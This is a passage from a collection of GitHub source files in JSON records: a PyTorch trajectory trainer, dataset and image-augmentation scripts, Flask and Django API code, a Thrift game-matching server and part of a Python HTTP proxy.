iteration(self, epoch, dataloader):\n raise NotImplementedError\n\n def compute_loss(self, data):\n raise NotImplementedError\n\n def write_log(self, name_str, data, epoch):\n if not self.enable_log:\n return\n self.logger.add_scalar(name_str, data, epoch)\n\n # 保存模型参数\n def save(self, iter_epoch, loss):\n \"\"\"\n save current state of the training and update the minimum loss value\n :param iter_epoch:\n :param loss:\n :return:\n \"\"\"\n self.min_eval_loss = loss\n if not os.path.exists(self.save_folder):\n os.makedirs(self.save_folder, exist_ok=True)\n torch.save({\n \"epoch\": iter_epoch,\n \"model_state_dict\": self.model.state_dict(),\n \"optimizer_state_dict\": self.optim.state_dict(),\n \"min_eval_loss\": loss\n }, os.path.join(self.save_folder, \"checkpoint_iter{}.ckpt\".format(iter_epoch)))\n if self.verbose:\n print(f'[Trainer]: Saving checkpoint to {self.save_folder} ...')\n\n def save_model(self, prefix=\"\"):\n \"\"\"\n save current state of the model\n :param prefix:\n :return:\n \"\"\"\n if not os.path.exists(self.save_folder):\n os.makedirs(self.save_folder, exist_ok=True)\n\n metric = self.compute_metric()\n\n # skip model saving if the minADE is not better\n if self.best_metric and isinstance(metric, dict):\n if metric[\"minADE\"] >= self.best_metric[\"minADE\"]:\n print(\"[Trainer]: Best minADE: {}; Current minADE: {}; Skip model saving...\".format(\n self.best_metric[\"minADE\"], metric[\"minADE\"]))\n return\n\n # save best metric\n if self.verbose:\n print(\"[Trainer]: Best minADE: {}; Current minADE: {}; Saving model to {}...\".format(\n self.best_metric[\"minADE\"] if self.best_metric else \"Inf\",\n metric[\"minADE\"],\n self.save_folder))\n self.best_metric = metric\n metric_stored_file = os.path.join(self.save_folder, \"{}_metrics.txt\".format(prefix))\n with open(metric_stored_file, 'a+') as f:\n f.write(json.dumps(self.best_metric))\n f.write(\"\\n\")\n\n # save model\n torch.save(\n self.model.state_dict(),\n # self.model.state_dict(),\n os.path.join(self.save_folder, \"{}_{}.pth\".format(prefix, type(self.model).__name__))\n )\n\n def load(self, load_path, mode='c'):\n \"\"\"\n loading function to load the ckpt or model\n :param mode: str, \"c\" for checkpoint, or \"m\" for model\n :param load_path: str, the path of the file to be load\n :return:\n \"\"\"\n if mode == 'c':\n # load ckpt\n ckpt = torch.load(load_path, map_location=self.device)\n try:\n self.model.load_state_dict(ckpt[\"model_state_dict\"])\n self.optim.load_state_dict(ckpt[\"optimizer_state_dict\"])\n self.min_eval_loss = ckpt[\"min_eval_loss\"]\n except:\n raise Exception(\"[Trainer]: Error in loading the checkpoint file {}\".format(load_path))\n elif mode == 'm':\n try:\n self.model.load_state_dict(torch.load(load_path, map_location=self.device))\n except:\n raise Exception(\"[Trainer]: Error in loading the model file {}\".format(load_path))\n else:\n raise NotImplementedError\n\n # 计算误差\n def compute_metric(self, miss_threshold=2.0):\n assert self.model, \"[Trainer]: No valid model, metrics can't be computed\"\n assert self.testset, \"[Trainer]: No test dataset, metrics can't be computed\"\n\n forecasted_trajectories, gt_trajectories = {}, {}\n seq_id = 0\n\n k = self.model.k\n horizon = self.model.horizon\n\n self.model.eval()\n with torch.no_grad():\n for data in tqdm(self.test_loader):\n batch_size = data.num_graphs\n gt = data.y.unsqueeze(1).view(batch_size, -1, 2).cumsum(axis=1).numpy()\n\n # inference and transfrom dimension\n out = self.model.inference(data.to(self.device))\n pred_y 
= out.cpu().numpy()\n\n #record the prediction and ground truth\n for batch_id in range(batch_size):\n forecasted_trajectories[seq_id] = [pred_y_k for pred_y_k in pred_y[batch_id]]\n gt_trajectories[seq_id] = gt[batch_id]\n seq_id += 1\n\n metric_results = get_displacement_errors_and_miss_rate(\n forecasted_trajectories,\n gt_trajectories,\n k,\n horizon,\n miss_threshold\n )\n return metric_results\n\n\n","repo_name":"gah07123/VehicleTrajectoryPrediction","sub_path":"MyVectorNet/trainer/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":8098,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"26701407461","text":"import os\nimport sys\nimport argparse\nimport pandas as pd\n\n\ndef get_args(argv):\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--dataset_root', type=str, default=\"/media/KLAB37/datasets/icubworldtransf\")\n parser.add_argument('--n_instances', type=int, default=10)\n parser.add_argument('--every_k_frames', type=int, default=10,\n help=\"Sample every k frames. Footage is at 10 fps, so a value of 10 means 1 fps.\")\n parser.add_argument('--cam', type=str, default=\"left\", help=\"Use the 'left' or 'right' cam images\")\n\n return parser.parse_args(argv)\n\n\nargs = get_args(sys.argv[1:])\n\n# These four directories should be inside the dataset_root folder (called something like icubworldtransf)\npart_dirs = [\"part1\", \"part2\", \"part3\", \"part4\"]\n\nsessions = ['MIX', 'ROT2D', 'ROT3D', 'SCALE', 'TRANSL']\n\nclass_dict = {}\nclass_ind = 0\nfor part_dir in part_dirs:\n assert part_dir in os.listdir(args.dataset_root)\n for class_name in os.listdir(os.path.join(args.dataset_root, part_dir)):\n class_path = os.path.join(part_dir, class_name)\n if os.path.isdir(os.path.join(args.dataset_root, class_path)):\n class_dict[class_name] = class_path\n class_ind += 1\n\ndfs = []\nfor class_ind, class_name in enumerate(list(class_dict.keys())):\n for instance_ind in range(args.n_instances):\n for session_ind, session in enumerate(sessions):\n session_path = os.path.join(class_dict[class_name], class_name + str(instance_ind+1), session)\n day_dir = sorted([d for d in os.listdir(os.path.join(args.dataset_root, session_path))\n if os.path.isdir(os.path.join(args.dataset_root, session_path, d))])[0]\n session_path = os.path.join(session_path, day_dir, args.cam)\n ims = sorted([im for im in os.listdir(os.path.join(args.dataset_root, session_path)) if \".jpg\" in im])\n df_list = []\n for im_ind, im in enumerate(ims[::args.every_k_frames]):\n row = {\n \"class\": class_ind,\n \"object\": instance_ind,\n \"session\": session_ind,\n \"im_num\": im_ind,\n \"im_path\": os.path.join(session_path, im),\n }\n df_list.append(row)\n dfs.append(pd.DataFrame(df_list))\n\nimg_df = pd.concat(dfs, ignore_index=True)\n\nimg_df = img_df.sort_values(by=[\"class\", \"object\", \"session\", \"im_num\"], ignore_index=True)\n\nimg_df.to_csv(\"icubworldtransf_dirmap.csv\", index=False)\n","repo_name":"MorganBDT/crumb","sub_path":"dataloaders/icubworldtransf_dirmap.py","file_name":"icubworldtransf_dirmap.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"35437833524","text":"def fib(n):\n if n == 0:\n return 1\n elif n == 1:\n return 1\n elif n > 1:\n return fib(n-1) + fib(n-2)\n else:\n return 0 \n\nlista = [] \nfor i in range(20):\n lista.append(fib(i)) #append junta \nprint(lista)\n\ndef fib_iterativa(n):\n 
lista = []\n for i in range(n):\n if i == 0:\n lista.append(1)\n\n elif i == 1:\n lista. append(1)\n\n elif i > 1:\n lista.append(lista[-1] + lista[-2])\n\n return lista[-1]\n \n","repo_name":"a97160/ATP2122--a97160","sub_path":"Exercícios Aula Teórica.py","file_name":"Exercícios Aula Teórica.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17943569171","text":"from schema import Schema, And, Use, Optional, SchemaError\nfrom flask import request\nfrom .status_responses import bad_request\nfrom functools import wraps\nfrom typing import Callable\n\n#Prevent redundancy and improve readibility\nstr_lower_strip = str, Use(str.lower), Use(str.strip)\n\n\nsupported_metrics = ('g','ml')\ndef metric_is_supported(metric:str) -> bool: \n return metric in supported_metrics\n\nIngredientsSchema = Schema([{'name': And(*str_lower_strip),\n 'amount': Use(int),\n 'metric': And(*str_lower_strip, metric_is_supported,\n error=f\"'ingredients' key 'metric' value '{{}}' should be one of the following strings: {supported_metrics}\")}])\n \nCreateRecipeSchema = Schema({'name': And(*str_lower_strip),\n 'ingredients': IngredientsSchema,\n Optional('steps'): {Use(int):str}})\n\nEditRecipeSchema = Schema({'name': And(*str_lower_strip),\n Optional('ingredients'): IngredientsSchema,\n Optional('steps'): {Use(int):str}})\n\ndef validate_schema(schema:Schema) -> Callable:\n def func_wrapper(f:Callable) -> Callable:\n @wraps(f)\n def wrapper(*args, **kwargs) -> Callable:\n try:\n schema.validate(request.json)\n\n # The following validations/transformations could not be expressed using the schema library\n if 'ingredients' in request.json:\n # Validate length of ingredients is not 0\n if len(request.json['ingredients'])==0:\n raise SchemaError('The number of ingredients can not be 0.')\n # Cast ingredients into a string after validating\n request.json['ingredients'] = str(request.json['ingredients'])\n\n\n except SchemaError as e:\n return bad_request(request.path, additional_message=(\"The JSON data sent does not conform to the expected schema.\\n\" \n f\"Please review documentation and see the following exception: {e}\"))\n else:\n return f(*args, **kwargs)\n return wrapper\n return func_wrapper\n","repo_name":"trutik/RecipeAPI","sub_path":"recipeapi/api/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42789589994","text":"from random import randrange\n\ndef dollar(a):\n b = '$' + str(round(a,2))\n return b\nprint(dollar(1.2342))\n\n# -----\n\n\ndef lens(n, R1, R2, d):\n f = ((n-1) * ((1/R1) - (1/R2) + ((n-1)*d) / (n*R1*R2)))**-1\n return round(f,2)\n\nprint(lens(1.2, 10, 10, .2))\n\n# -----\n\n\ndef scramble(word):\n\n if len(word) > 3:\n rand_letter_1 = randrange(1, len(word)-1)\n rand_letter_2 = randrange(1, len(word)-1)\n\n while rand_letter_2 == rand_letter_1:\n rand_letter_2 = randrange(1, len(word)-1)\n\n word_str = list(word)\n word_str[rand_letter_2], word_str[rand_letter_1] = word_str[rand_letter_1], word_str[rand_letter_2]\n word = ''.join(word_str)\n\n return word\n\nprint(scramble('hello'))\n\n# -----\n\n\ndef build_sentence(sentence):\n\n words = sentence.split()\n sentence_out = []\n\n for i in words:\n sentence_out.append(scramble(i))\n sentence_out.append(' ')\n\n sentence_out = ''.join(sentence_out)\n return sentence_out\n\na = build_sentence('yes I would like 
that')\nprint(a)","repo_name":"mastertweed/Python","sub_path":"ECE203/ECE203 Lab4/ECE203 Lab4'.py","file_name":"ECE203 Lab4'.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33997360050","text":"import tensorflow as tf\nfrom pathlib import Path\nimport uuid\n\nfrom typing import Union\n\nfrom .constants import DEFAULT_MODEL_NAME, DEFAULT_PRED_THRESHOLD, DEFAULT_ARG_THREHSOLD, DEFAULT_SENTENCE_SIZE\nfrom .argument_prediction import ArgumentPredictor\nfrom .predicate_extraction import PredicateExtractor\nfrom .data_formatter import DataFormatter\n\n\nclass TripleExtractor(DataFormatter):\n def __init__(self, pe_layers_or_name: Union[tuple[int], str], ap_layers_or_name: Union[tuple[int], str], sentence_size: int = DEFAULT_SENTENCE_SIZE) -> None:\n if isinstance(pe_layers_or_name, str):\n self.predicate_extractor = PredicateExtractor.load(pe_layers_or_name)\n else:\n self.predicate_extractor = PredicateExtractor(*pe_layers_or_name, sentence_size=sentence_size)\n\n if isinstance(ap_layers_or_name, str):\n self.argument_predictor = ArgumentPredictor.load(ap_layers_or_name)\n else:\n self.argument_predictor = ArgumentPredictor(*ap_layers_or_name, sentence_size=sentence_size)\n\n @classmethod\n def load(cls, name: str = DEFAULT_MODEL_NAME):\n return cls(name, name)\n\n def save(self, name: str = DEFAULT_MODEL_NAME):\n self.predicate_extractor.save(name)\n self.argument_predictor.save(name)\n\n def compile(self, pe_optimizer=None, pe_loss=None, pe_metrics=None, ap_optimizer=None, ap_loss=None,\n ap_metrics=None):\n default_optimizer = tf.keras.optimizers.SGD(learning_rate=0.01)\n default_loss = tf.keras.losses.CategoricalCrossentropy()\n default_metrics = [tf.keras.metrics.CategoricalCrossentropy()]\n\n pe_optimizer = pe_optimizer or ap_optimizer or default_optimizer\n pe_loss = pe_loss or ap_loss or default_loss\n pe_metrics = pe_metrics or ap_metrics or default_metrics\n\n ap_optimizer = ap_optimizer or pe_optimizer or default_optimizer\n ap_loss = ap_loss or pe_loss or default_loss\n ap_metrics = ap_metrics or pe_metrics or default_metrics\n\n self.predicate_extractor.compile(optimizer=pe_optimizer, loss=pe_loss, metrics=pe_metrics)\n self.argument_predictor.compile(optimizer=ap_optimizer, loss=ap_loss, metrics=ap_metrics)\n\n def summary(self):\n self.predicate_extractor.summary()\n self.argument_predictor.summary()\n\n def fit(self, training_sentences, *args, merge_repeated=False, epochs=20, pe_epochs=None, ap_epochs=None,\n early_stopping=False, callbacks=None, **kwargs):\n pe_epochs = pe_epochs or epochs\n ap_epochs = ap_epochs or epochs\n\n print(\"Predicate Extractor:\")\n self.predicate_extractor.fit(training_sentences, *args, merge_repeated=merge_repeated, epochs=pe_epochs,\n early_stopping=early_stopping, callbacks=callbacks, **kwargs)\n print(\"\\nArgument predictor:\")\n self.argument_predictor.fit(training_sentences, *args, merge_repeated=merge_repeated, epochs=ap_epochs,\n early_stopping=early_stopping, callbacks=callbacks, **kwargs)\n\n def predict(self, sentences: list[str], pred_threshold=DEFAULT_PRED_THRESHOLD,\n arg_threshold=DEFAULT_ARG_THREHSOLD):\n arg_pred_inputs = self.predicate_extractor(sentences, acceptance_threshold=pred_threshold)\n outputs = self.argument_predictor(arg_pred_inputs, acceptance_threshold=arg_threshold)\n return outputs\n\n def annotate_sentences(self, sentences: list[str], pred_threshold=DEFAULT_PRED_THRESHOLD,\n 
arg_threshold=DEFAULT_ARG_THREHSOLD):\n outputs = self.predict(sentences, pred_threshold=pred_threshold, arg_threshold=arg_threshold)\n for sentence_id, tokens, pred_masks, subj_mask, obj_mask in outputs:\n annotation = self.build_annotation(sentence_id, tokens, pred_masks, subj_mask, obj_mask)\n print(annotation)\n print()\n\n def gen_csv(self, sentences: list[str], filepath: Path, pred_threshold=DEFAULT_PRED_THRESHOLD,\n arg_threshold=DEFAULT_ARG_THREHSOLD, title='', id_prefix=''):\n outputs = self.predict(sentences, pred_threshold=pred_threshold, arg_threshold=arg_threshold)\n df = self.build_df(outputs, id_prefix=id_prefix)\n with filepath.open('w', encoding=\"utf-8\") as f:\n f.write(f\"# {title}\\n\")\n df.to_csv(f, sep=\";\", index=False, lineterminator='\\n')\n return df\n\n def process_doc(self, doc_path: Path, csv_path: Union[Path, None] = None,\n pred_threshold=DEFAULT_PRED_THRESHOLD, arg_threshold=DEFAULT_ARG_THREHSOLD):\n csv_path = csv_path or doc_path.with_suffix('.csv')\n\n with doc_path.open(encoding=\"utf-8\") as f:\n doc = f.read()\n sentences = self.doc_to_sentences(doc)\n id_prefix = str(uuid.uuid4())\n\n return self.gen_csv(\n sentences,\n csv_path,\n title=doc_path.as_posix(),\n id_prefix=id_prefix,\n pred_threshold=pred_threshold,\n arg_threshold=arg_threshold\n )\n\n def process_docs(self, doc_dir: list[Path], csv_dir: Path,\n pred_threshold=DEFAULT_PRED_THRESHOLD, arg_threshold=DEFAULT_ARG_THREHSOLD):\n for doc_path in doc_dir:\n self.process_doc(\n doc_path,\n (csv_dir / doc_path.stem).with_suffix(\".csv\"),\n pred_threshold=pred_threshold,\n arg_threshold=arg_threshold\n )\n","repo_name":"Pligabue/PTBR-OpenIE","sub_path":"triple_extractor_ptbr_pligabue/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"19547799004","text":"import pandas as pd\nimport numpy as np\nfrom skimage import io\nfrom skimage.transform import rotate\nimport cv2\nimport os\nimport time\n\next = '.jpeg'\n\n\ndef rotate_images(file_path, degrees_of_rotation, lst_imgs):\n '''\n Rotates image based on a specified amount of degrees\n\n INPUT\n file_path: file path to the folder containing images.\n degrees_of_rotation: Integer, specifying degrees to rotate the\n image. 
Set number from 1 to 360.\n lst_imgs: list of image strings.\n\n OUTPUT\n Images rotated by the degrees of rotation specififed.\n '''\n new_img_lis = []\n for l in lst_imgs:\n img = io.imread(file_path + str(l))\n for deg in degrees_of_rotation:\n img = rotate(img, deg)\n f_name = file_path + str(l).rstrip(ext) + '_' + str(deg) + ext\n io.imsave(f_name, img)\n new_img_lis.append(f_name)\n return new_img_lis\n\n\ndef mirror_images(file_path, mirror_direction, lst_imgs):\n '''\n Mirrors image left or right, based on criteria specified.\n\n INPUT\n file_path: file path to the folder containing images.\n mirror_direction: criteria for mirroring left or right.\n lst_imgs: list of image strings.\n\n OUTPUT\n Images mirrored left or right.\n '''\n new_img_lis = []\n\n for l in lst_imgs:\n img = cv2.imread(file_path + str(l))\n img = cv2.flip(img, mirror_direction)\n f_name = file_path + str(l).rstrip(ext) + '_mir' + ext\n cv2.imwrite(f_name, img)\n new_img_lis.append(f_name)\n return new_img_lis\n\n\nif __name__ == '__main__':\n start_time = time.time()\n print(os.listdir(r'./Data'))\n trainLabels = pd.read_csv(r\"./Data/trainLabels_master_v2.csv\")\n\n # trainLabels['image'] = trainLabels['image'].str.rstrip('.jpeg') tesing\n trainLabels_no_DR = trainLabels[trainLabels['level'] == 0]\n trainLabels_DR = trainLabels[trainLabels['level'] >= 1]\n\n path = r'./Data/train_cp/'\n\n lst_imgs_no_DR = [i for i in trainLabels_no_DR['image']]\n lst_imgs_DR = [i for i in trainLabels_DR['image']]\n\n # lst_sample = [i for i in os.listdir('../data/sample/') if i != '.DS_Store'] test\n # lst_sample = [str(l.strip('.jpeg')) for l in lst_sample] test\n\n # Mirror Images with no DR one time\n print(\"Mirroring Non-DR Images\")\n lst_imgs_no_DR.extend(mirror_images(path, 1, lst_imgs_no_DR))\n\n # Rotate all images that have any level of DR\n lst_imgs_DR_temp = []\n print(\"Rotating DR images to 70, 100, 160 and 250 Degrees\")\n lst_imgs_DR_temp.extend(rotate_images(\n path, [70, 100, 160, 250], lst_imgs_DR))\n\n print(\"Mirroring DR Images\")\n lst_imgs_DR_temp.extend(mirror_images(path, 0, lst_imgs_DR))\n\n lst_imgs_DR.extend(lst_imgs_DR_temp)\n\n print(\"Updating the CSV Index\")\n\n lst_imgs_no_DR_with_labels = np.column_stack(\n (np.array(lst_imgs_no_DR), np.zeros((len(lst_imgs_no_DR),), dtype=int)))\n lst_imgs_DR_with_labels = np.column_stack(\n (np.array(lst_imgs_DR), np.ones((len(lst_imgs_DR),), dtype=int)))\n\n print(\"No-DR images Augmented: \", len(lst_imgs_no_DR_with_labels))\n print(\"DR images Augmented: \", len(lst_imgs_DR_with_labels))\n\n image_data_all = np.concatenate(\n (lst_imgs_no_DR_with_labels, lst_imgs_DR_with_labels), axis=0)\n df = pd.DataFrame(image_data_all, columns=['image', 'level'])\n df.to_csv(r'./Data/trainLabels_master_v4_final.csv')\n print(\"Completed\")\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n","repo_name":"AbdullahJanKhan/isee","sub_path":"dr_model/training/augment.py","file_name":"augment.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"35348229632","text":"\"\"\"\nFlashCourses Decks & Cards REST API Class-Based URLs\n\nFile Path: /flash/src/flashcards/api/urls.py\n\nModified By: Patrick R. McElhiney\nDate Modified: 4/16/2018\n\"\"\"\n\nfrom django.urls import path\nfrom . 
import views\n\nfrom .views import (\n CreateDeckAPIView,\n RetrieveDeckAPIView,\n ListDeckAPIView,\n DestroyDeckAPIView,\n UpdateDeckAPIView,\n DetailDeckAPIView,\n CreateCardAPIView,\n RetrieveCardAPIView,\n ListCardAPIView,\n DestroyCardAPIView,\n UpdateCardAPIView,\n)\n\napp_name = 'flashcards_api'\n\nurlpatterns = [\n path('deck/create/', views.CreateDeckAPIView.as_view(), name='deck_create'),\n path('deck/retrieve/', views.RetrieveDeckAPIView.as_view(), name='deck_retrieve'),\n path('deck/list/', views.ListDeckAPIView.as_view(), name='deck_list'),\n path('deck/delete/', views.DestroyDeckAPIView.as_view(), name='deck_delete'),\n path('deck/update/', views.UpdateDeckAPIView.as_view(), name='deck_update'),\n path('deck/detail/', views.DetailDeckAPIView.as_view(), name='deck_detail'),\n path('card/create/', views.CreateCardAPIView.as_view(), name='card_create'),\n path('card/retrieve/', views.RetrieveCardAPIView.as_view(), name='card_retrieve'),\n path('card/list/', views.ListCardAPIView.as_view(), name='card_list'),\n path('card/delete/', views.DestroyCardAPIView.as_view(), name='card_delete'),\n path('card/update/', views.UpdateCardAPIView.as_view(), name='card_update')\n]\n\n","repo_name":"dmc1049/flashcourses","sub_path":"flash/src/flashcards/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35098589647","text":"import glob\nimport sys\nsys.path.insert(0, glob.glob('../../')[0])\n\nfrom match_service import Match\nfrom match_service.ttypes import Player\n\nfrom thrift.transport import TSocket\nfrom thrift.transport import TTransport\nfrom thrift.protocol import TBinaryProtocol\nfrom thrift.server import TServer\n\nfrom queue import Queue\nfrom time import sleep\nfrom threading import Thread\n\nfrom ai_game_platform.asgi import channel_layer\nfrom asgiref.sync import async_to_sync\nfrom django.core.cache import cache\n\nqueue = Queue() # 消息队列\n\nclass Operate:\n def __init__(self, type, player):\n self.type = type\n self.player = player\n\nclass Pool:\n def __init__(self):\n self.players = []\n self.wt = []\n\n def add_player(self, player):\n self.players.append(player)\n self.wt.append(0)\n gameCnt = cache.get('game_cnt', 0)\n if gameCnt >= 5:\n async_to_sync(channel_layer.group_send) (\n \"matching-player-%d\" % player.id,\n {\n 'type': \"group_send_event\",\n 'event': \"prompt\",\n 'prompt': \"由于当前平台资源不足, 正在进行>=5场游戏,请耐心等待...\",\n }\n )\n\n def remove_player(self, player):\n for i in range(len(self.players)):\n if self.players[i].id == player.id:\n del self.players[i]\n del self.wt[i]\n print(\"删除%d成功\" % i)\n break\n\n def check_match(self, i, j):\n playerA = self.players[i]\n playerB = self.players[j]\n if playerA.game_id != playerB.game_id: return False\n # 防止相同玩家匹配在一起\n if playerA.id == playerB.id:\n return False\n dt = abs(playerA.rating - playerB.rating)\n waitingtime = self.wt[i] if self.wt[i] < self.wt[j] else self.wt[j]\n return dt <= waitingtime * 50\n\n def match_success(self, ps):\n print(\"Match Success: %s %s\" % (ps[0].username, ps[1].username))\n room_name = \"room-%s-%s\" % (ps[0].id, ps[1].id)\n type = \"\"\n if ps[0].game_id == 1:\n type = \"start_gobang_game\"\n cache.set('gobang_matching_players', cache.get('gobang_matching_players', 0) - len(ps))\n elif ps[0].game_id == 2:\n type = \"start_snake_game\"\n cache.set('snake_matching_players', cache.get('snake_matching_players', 0) - len(ps))\n elif ps[0].game_id == 3:\n type = 
\"start_reversi_game\"\n cache.set('reversi_matching_players', cache.get('reversi_matching_players', 0) - len(ps))\n players = []\n for p in ps:\n async_to_sync(channel_layer.group_discard)(\"matching-player-%d\" % p.id, p.channel_name)\n async_to_sync(channel_layer.group_add)(room_name, p.channel_name)\n players.append({\n 'username': p.username,\n 'photo': p.photo,\n })\n cache.set(room_name, players, 3600) # 有效时间: 一小时\n async_to_sync(channel_layer.group_send) (\n room_name,\n {\n 'type': type,\n 'room_name': room_name,\n 'a_id': ps[0].id,\n 'a_username': ps[0].username,\n 'a_photo': ps[0].photo,\n 'a_operate': ps[0].operate,\n 'a_bot_id': ps[0].bot_id,\n 'b_id': ps[1].id,\n 'b_username': ps[1].username,\n 'b_photo': ps[1].photo,\n 'b_operate': ps[1].operate,\n 'b_bot_id': ps[1].bot_id\n }\n )\n\n\n def increase_waiting_time(self):\n for i in range(len(self.wt)):\n self.wt[i] += 1\n\n def match(self):\n if cache.get('game_cnt', 0) >= 5: return\n\n while len(self.players) > 1:\n flag = False\n for i in range(len(self.players)):\n for j in range(i + 1, len(self.players)):\n if self.check_match(i, j):\n playerA = self.players[i]\n playerB = self.players[j]\n self.match_success([playerA, playerB])\n self.players = self.players[:i] + self.players[i + 1:j] + self.players[j + 1:]\n self.wt = self.wt[:i] + self.wt[i + 1:j] + self.wt[j + 1:]\n flag = True\n break\n if flag: break\n if not flag: break\n if cache.get('game_cnt', 0) >= 5: break\n self.increase_waiting_time()\n\nclass MatchHandler:\n def add_player(self, player):\n print(\"Add Player: %s %d\" % (player.username, player.rating))\n op = Operate(\"add\", player)\n queue.put(op)\n return 0\n\n def remove_player(self, player):\n print(\"Remove Player: %s %d\" % (player.username, player.rating));\n op = Operate(\"remove\", player)\n queue.put(op)\n return 0\n\ndef get_operate_from_queue():\n try:\n return queue.get_nowait()\n except:\n return None\n\ndef worker():\n pool = Pool()\n while True:\n op = get_operate_from_queue()\n if op:\n if op.type == \"add\":\n pool.add_player(op.player)\n else:\n pool.remove_player(op.player)\n else:\n pool.match()\n sleep(1)\n\nif __name__ == '__main__':\n handler = MatchHandler()\n processor = Match.Processor(handler)\n transport = TSocket.TServerSocket(host='127.0.0.1', port=9091)\n tfactory = TTransport.TBufferedTransportFactory()\n pfactory = TBinaryProtocol.TBinaryProtocolFactory()\n\n server = TServer.TThreadedServer(processor, transport, tfactory, pfactory)\n\n Thread(target=worker, daemon=True).start() # 开一个线程\n\n print('Starting the server...')\n server.serve()\n print('done.')\n","repo_name":"ZzqForCoding/ai_game","sub_path":"ai_game_backend_code/match_system/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5890,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"40129405950","text":"#!/usr/bin/env python\n# Encoding: iso-8859-1\n# -----------------------------------------------------------------------------\n# Project : Retro - HTTP Toolkit\n# -----------------------------------------------------------------------------\n# Author : Sebastien Pierre \n# License : Revised BSD License\n# -----------------------------------------------------------------------------\n# Creation : 12-Apr-2006\n# Last mod : 08-Jan-2016\n# -----------------------------------------------------------------------------\n\nimport os\nimport sys\nimport time\nfrom os.path import abspath, dirname, join\nfrom retro import *\nfrom retro.wsgi 
import SERVER_ERROR_CSS\n\nDEFAULT_PORT = 8000\n\n# ------------------------------------------------------------------------------\n#\n# PROXY COMPONENT\n#\n# ------------------------------------------------------------------------------\n\n\nclass Proxy:\n \"\"\"A basic (forwarding) proxy implementation that is used by the\n ProxyService in this module.\"\"\"\n\n THROTTLING = 0\n\n def requestAsString(self, method, server, port, uri, headers, body):\n headers = (\"%s: %s\" % (h[0], h[1])\n for h in list(headers.items()) if h[1] != None)\n return (\n \"%s %s:%s %s\\n\"\n \"%s\\n\\n\"\n \"%s\\n\\n\"\n ) % (method, server, port, uri, \"\\n\".join(headers), body)\n\n def filterHeaders(self, headers):\n res = {}\n for name, value in list(headers.items()):\n if value != None:\n res[name] = value\n return res\n\n def proxyGET(self, request, server, port, uri, parameters):\n # print self.requestAsString(request.method(), server, port, uri, request.headers, request.body())\n status, headers, body = self.httpRequest(\n server, port, \"GET\", uri, headers=self.filterHeaders(request.headers))\n return request.respond(content=body, headers=headers, status=status)\n\n def proxyPOST(self, request, server, port, uri):\n # print self.requestAsString(request.method(), server, port, uri, request.headers, request.body())\n status, headers, body = self.httpRequest(\n server, port, \"POST\", uri, body=request.body(), headers=self.filterHeaders(request.headers))\n return request.respond(content=body, headers=headers, status=status)\n\n def proxyPUT(self, request, server, port, uri):\n # print self.requestAsString(request.method(), server, port, uri, request.headers, request.body())\n status, headers, body = self.httpRequest(\n server, port, \"PUT\", uri, body=request.body(), headers=self.filterHeaders(request.headers))\n return request.respond(content=body, headers=headers, status=status)\n\n def proxyDELETE(self, request, server, port, uri):\n # print self.requestAsString(request.method(), server, port, uri, request.headers, request.body())\n status, headers, body = self.httpRequest(\n server, port, \"DELETE\", uri, body=request.body(), headers=self.filterHeaders(request.headers))\n return request.respond(content=body, headers=headers, status=status)\n\n def hasBackend(self):\n return True\n\n def httpRequest(self, server, port, method, url, body=\"\", headers=None):\n # NOTE: This is not fast at all, but it works!\n import wwwclient\n import wwwclient.defaultclient\n s = wwwclient.Session(client=wwwclient.defaultclient.HTTPClient)\n url = \"http://{0}:{1}{2}\".format(server, port, url)\n print(\"[PROXY] {0}\".format(url))\n t = getattr(s, method.lower())(url)\n data = t.data()\n if self.THROTTLING > 0:\n bytes_per_second = int(self.THROTTLING * 1000.0)\n\n def throttling_wrapper():\n i = 0\n while i < len(data):\n if i > 0:\n time.sleep(1)\n j = min(len(data), i + bytes_per_second)\n yield data[i:j]\n i = j\n res = throttling_wrapper()\n return 200, t.headers, data\n\n # NOTE: This does not seem to work properly..., so disabled for now\n # def _httpRequest( self, server, port, method, url, body=\"\", headers=None ):\n #\timport httplib\n #\tconn = httplib.HTTPConnection(server, int(port))\n #\tconn.request(method, url, body, headers or {})\n #\tprint \"[PROXY] {0} {1}:{2}{3}\".format(method, server, port, url)\n #\tresp = conn.getresponse()\n #\tdata = resp.read()\n #\tres = data\n #\tif self.THROTTLING > 0:\n #\t\tbytes_per_second = int(self.THROTTLING * 1000.0)\n #\t\tdef throttling_wrapper():\n #\t\t\ti = 
